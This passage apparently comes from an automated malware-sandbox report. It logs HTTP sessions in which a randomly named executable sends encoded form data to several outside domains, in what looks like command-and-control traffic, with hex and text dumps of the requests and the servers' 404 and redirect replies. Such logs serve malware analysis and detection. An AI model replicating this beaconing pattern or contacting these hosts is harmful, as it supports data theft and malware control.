                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 6e 58 69 35 66 4f 61 72 37 63 52 44 71 76 5a 6a 4a 32 46 71 6d 6d 37 59 63 69 65 6a 47 51 30 70 2b 6f 71 2f 56 2f 6f 46 44 4c 58 4e 66 74 7a 52 33 4a 54 50 64 4d 71 78 6c 7a 4a 6b 44 79 5a 46 56 6a 33 56 55 76 33 6b 74 30 65 47 30 77 71 48 79 73 56 57 6c 34 6a 64 64 68 42 54 38 37 41 69 49 52 69 51 66 38 34 4a 50 32 79 68 32 6a 4f 4c 35 55 78 58 70 33 76 59 46 5a 67 41 6d 4c 6e 4b 51 55 58 44 75 4a 4b 64 56 30 6a 53 62 53 57 4d 4d 43 78 5a 41 58 53 56 6a 4b 4c 61 54 66 49 75 66 44 56 77 35 2b 4c 79 73 69 6a 46 31 57 42 49 69 41 52 42 7a 54 68 59 54 2b 48 7a 2f 2f 53 54 58 32 75 37 74 44 37 6c 64 57 58 45 32 34 35 4e 55 6b 45 47 36 2b 31 74 49 73 71 70 65 7a 50 6d 68 74 55 4e 53 34 6c 68 4b 47 71 77 47 71 69 7a 45 74 78 42 46 30 75 64 46 64 39 7a 37 36 50 78 57 6d 54 4a 68 55 6e 59 7a 42 52 65 69 36 70 66 47 4d 78 6e 6b 38 67 2b 79 79 56 67 6a 42 46 54 [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkKnXi5fOar7cRDqvZjJ2Fqmm7YciejGQ0p+oq/V/oFDLXNftzR3JTPdMqxlzJkDyZFVj3VUv3kt0eG0wqHysVWl4jddhBT87AiIRiQf84JP2yh2jOL5UxXp3vYFZgAmLnKQUXDuJKdV0jSbSWMMCxZAXSVjKLaTfIufDVw5+LysijF1WBIiARBzThYT+Hz//STX2u7tD7ldWXE245NUkEG6+1tIsqpezPmhtUNS4lhKGqwGqizEtxBF0udFd9z76PxWmTJhUnYzBRei6pfGMxnk8g+yyVgjBFT/UdPsto28DhRdnm2+R7frtwS4lnfeBGoluzMdIWtSvJjH469Vo4FxShn2l1EUPfCsu0Q3bmCx4KRgRJUSpR+TH3mo4R/zYGn8P7YyGc2T4T8N+fbYzT4Pn/37A8eUOjKibbKlCIRW1QSZeI75epVM7tQeI9jwXa9EtKuwi8dIfX+YP+rIOscflcHWmVS9qk4Q5zdk/TmZHzqpI8B8EI3VJxKwtNr5d9OPaD4neM6g0oLh0jvgg4OiNjPr1KgxoVJ+e/gkk24BncdiwHk6VJESxAzHA2UE/MQJY1UpjClEl53YiV9dwXSSfbohFlGDiiD6Wpw8/6NEAVJy69IW4sjGRJp33jTJKbORvd4zWQIdLFhXr0NGlQRqBre4TX5GT4k/VEP0LWiO7CBj36TdhGWjnvtHF66JJVb/IJe39C+hOIRZGuwbM/fGJHHU45gw33LICgRwWEvrBI5jXBAisPX8XroVxrlDCp1PRUhDE6umd4D1xulYY6Rl+pK36oAYldEsiPCkehGXcdcIouqmBWvtKXoe4VI0NrghEvsDDCXzUCeBvNX7eUAZIs+tIQ/NcEBXQ/tmDL47Z0I6Fyj5FyPCiPo8dWDsqj4TDKlt7s5zpFkgATm2d8FA6zY6LcYBd2LxW2CoUgO9X/8HNJBi6SKUwbmu4rsOGL8xb [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.8497243.33.130.190801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:45:58.682178974 CET554OUTGET /0598/?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.mcfunding.org
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:45:59.907481909 CET413INHTTP/1.1 200 OK
                                                                  Server: openresty
                                                                  Date: Fri, 22 Nov 2024 13:45:59 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 273
                                                                  Connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 66 6f 3d 47 46 31 34 73 76 79 68 48 34 34 64 74 26 4e 6a 48 70 54 66 68 3d 74 36 38 42 4e 30 39 69 56 65 71 62 2f 49 75 4c 46 31 6f 61 37 4c 47 44 4f 30 37 2f 57 37 43 46 49 6f 6f 63 48 51 73 33 6c 6f 7a 71 67 36 50 69 45 34 69 72 5a 42 2b 64 56 6b 52 63 4e 4b 6e 33 71 71 59 54 66 7a 2b 55 32 4b 4b 73 6b 64 52 73 76 47 76 34 64 4d 53 50 6d 53 79 4d 58 76 46 77 75 68 42 6d 4e 46 36 53 52 30 30 66 35 78 45 4d 78 30 52 68 56 6d 63 69 69 47 61 72 42 55 46 78 39 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1fo=GF14svyhH44dt&NjHpTfh=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dMSPmSyMXvFwuhBmNF6SR00f5xEMx0RhVmciiGarBUFx9Q=="}</script></head></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.849725198.252.98.54801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:05.637442112 CET822OUTPOST /y3dc/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.migorengya8.click
                                                                  Referer: http://www.migorengya8.click/y3dc/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 69 77 4d 7a 34 58 74 7a 71 46 51 54 68 36 69 76 77 6b 4a 38 68 4b 46 36 30 33 42 51 33 6e 4b 4b 2b 4d 6f 70 38 55 42 71 4f 70 70 63 66 33 76 70 61 47 72 52 4e 31 6e 63 69 44 38 6b 53 46 39 39 63 4d 62 42 2b 4d 70 4d 66 54 6a 70 79 2b 35 6d 36 52 6f 78 41 76 38 71 6e 44 6a 47 61 34 78 68 48 51 71 51 32 65 35 42 62 49 39 38 30 30 49 52 51 37 30 69 31 49 50 4d 2f 4a 66 32 45 35 4b 63 4d 75 73 49 68 52 4d 32 56 56 62 4d 4b 70 51 71 65 53 37 43 4e 4a 36 70 6f 42 58 45 6e 6b 46 56 63 74 41 46 49 49 76 75 48 7a 71 56 6a 7a 55 36 49 75 35 54 78 4f 6f 58 76 6e 51 3d
                                                                  Data Ascii: NjHpTfh=vjjmaXWtymtuiwMz4XtzqFQTh6ivwkJ8hKF603BQ3nKK+Mop8UBqOppcf3vpaGrRN1nciD8kSF99cMbB+MpMfTjpy+5m6RoxAv8qnDjGa4xhHQqQ2e5BbI9800IRQ70i1IPM/Jf2E5KcMusIhRM2VVbMKpQqeS7CNJ6poBXEnkFVctAFIIvuHzqVjzU6Iu5TxOoXvnQ=
                                                                  Nov 22, 2024 14:46:06.938314915 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:06 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  18192.168.2.849726198.252.98.54801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:08.293920994 CET842OUTPOST /y3dc/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.migorengya8.click
                                                                  Referer: http://www.migorengya8.click/y3dc/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 69 4b 39 74 59 70 75 46 42 71 65 35 70 63 4b 48 75 6a 56 6d 72 67 4e 31 71 6a 69 44 41 6b 53 46 70 39 63 4e 72 42 2b 2f 42 50 66 44 6a 72 2b 65 35 67 30 78 6f 78 41 76 38 71 6e 44 33 6f 61 34 35 68 48 67 61 51 6b 50 35 4f 57 6f 39 2f 6b 45 49 52 44 72 30 6d 31 49 4f 6a 2f 49 43 6a 45 2f 47 63 4d 72 41 49 69 44 30 70 63 56 62 4b 4f 70 52 72 52 78 4b 30 4c 71 6d 4d 70 44 57 67 37 48 74 38 51 37 78 76 53 71 6e 6f 45 7a 43 2b 6a 77 38 4d 4e 5a 6b 37 72 74 34 6e 78 77 46 35 4b 57 52 4d 77 68 45 65 36 59 30 67 65 64 35 70 61 70 56 70
                                                                  Data Ascii: NjHpTfh=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RiK9tYpuFBqe5pcKHujVmrgN1qjiDAkSFp9cNrB+/BPfDjr+e5g0xoxAv8qnD3oa45hHgaQkP5OWo9/kEIRDr0m1IOj/ICjE/GcMrAIiD0pcVbKOpRrRxK0LqmMpDWg7Ht8Q7xvSqnoEzC+jw8MNZk7rt4nxwF5KWRMwhEe6Y0ged5papVp
                                                                  Nov 22, 2024 14:46:09.548312902 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:09 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  19192.168.2.849727198.252.98.54801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:10.945439100 CET1859OUTPOST /y3dc/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.migorengya8.click
                                                                  Referer: http://www.migorengya8.click/y3dc/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 76 6a 6a 6d 61 58 57 74 79 6d 74 75 6a 54 55 7a 72 6b 56 7a 73 6c 51 63 75 61 69 76 35 45 4a 34 68 4b 42 36 30 32 46 35 33 52 61 4b 2b 65 41 70 38 79 39 71 64 35 70 63 57 58 75 67 56 6d 72 39 4e 31 79 76 69 44 4d 65 53 48 52 39 63 76 6a 42 33 75 42 50 4d 6a 6a 72 6a 4f 35 68 36 52 6f 42 41 76 73 75 6e 44 6e 6f 61 34 35 68 48 69 43 51 6e 65 35 4f 46 34 39 38 30 30 49 56 51 37 30 65 31 49 6d 5a 2f 49 47 7a 48 50 6d 63 4d 4b 73 49 75 57 59 70 45 46 62 49 4a 70 51 34 52 78 47 6e 4c 71 36 75 70 43 7a 46 37 45 4e 38 56 71 73 75 41 4a 50 53 62 77 36 65 68 67 34 4c 41 4c 6b 4b 74 66 70 51 74 48 70 6f 64 43 52 63 2f 67 77 74 36 5a 4d 70 63 37 78 44 58 50 63 79 76 74 62 31 7a 36 4f 59 76 47 37 59 72 58 75 6d 64 68 67 70 6c 5a 5a 70 74 52 34 48 59 2f 58 78 52 63 30 71 46 5a 65 68 6f 4c 77 6c 6e 38 69 6d 4a 41 72 51 62 41 62 42 62 38 54 4f 72 51 46 69 4a 31 56 34 63 2f 5a 44 58 4a 4a 7a 44 51 37 6f 37 38 69 4a 4e 56 62 6f 33 63 6e 6b 37 44 49 4f 43 75 4d 34 4e 2b 64 64 72 61 39 4b 63 76 [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=vjjmaXWtymtujTUzrkVzslQcuaiv5EJ4hKB602F53RaK+eAp8y9qd5pcWXugVmr9N1yviDMeSHR9cvjB3uBPMjjrjO5h6RoBAvsunDnoa45hHiCQne5OF49800IVQ70e1ImZ/IGzHPmcMKsIuWYpEFbIJpQ4RxGnLq6upCzF7EN8VqsuAJPSbw6ehg4LALkKtfpQtHpodCRc/gwt6ZMpc7xDXPcyvtb1z6OYvG7YrXumdhgplZZptR4HY/XxRc0qFZehoLwln8imJArQbAbBb8TOrQFiJ1V4c/ZDXJJzDQ7o78iJNVbo3cnk7DIOCuM4N+ddra9KcvLNiCusQaQwC13KtkIIgiWSM3FAhlZXyxVf2aoG4PoykmIAfmsmqgHDOCFB5DpTcE5UBaMyMZWF2Dii/7/i5RUA7sNaiu56yWBKQMHTTwWMc3tH6OK0C+MOwF4zZwgRnaDkmLlAYpEwg2sNJgBF/Xt0ojEHUUw3msc4JAKDtyzuP5xNy0qbi02hYAtMMzv1lLDXOm6BSEFFeDrpDL5ahX7OmoK3ok9mRyFRjMgORRqQL4q7BpPkE+KDmL+OClnOfSrpATCfWfoKjd4LVrOieNDAjmHAlTCYcPMyqFh64WkAdUxQaHbDxE3WJKPPD0q2Ylrb4wRvdToQjY6v7lISB9HlbZ2eiB964BZN9o/MVh1UFB0scgj1K02+wPVDqxaftEn4inJkqUoufXagl9vwaY517l2r0u7Lqdaz18y+mV+S2tUoG7XEbYH+WNpgh3Im5zhp6E/laEznG14RxzJ0TKWZ3nt8w0bpm5LKjovH/FJAjR37coCOC8hQZ4Jr75hYDOB6EIb8sjTf8AQWJSjCRHK7d4rs8KYsABpbLNFgZ7Wh3031G4jabnSvRFjSSkkq+tkAO1QCUBatSomkbyR6g5Fx3tIGAcO2JDZQuYHsbJwOz5wWSYdmnD9GlTn3a7/jhhSQXQ1bVFWGUvEeVMkq5zOmwsIaHaMofGwH [TRUNCATED]
                                                                  Nov 22, 2024 14:46:12.157075882 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:11 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.849728198.252.98.54801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:13.601231098 CET558OUTGET /y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:46:14.897952080 CET1033INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:14 GMT
                                                                  server: LiteSpeed
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.849729103.224.182.242801240C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Nov 22, 2024 14:46:21.224944115 CET801OUTPOST /3m3e/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.klohk.tech
                                                                  Referer: http://www.klohk.tech/3m3e/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
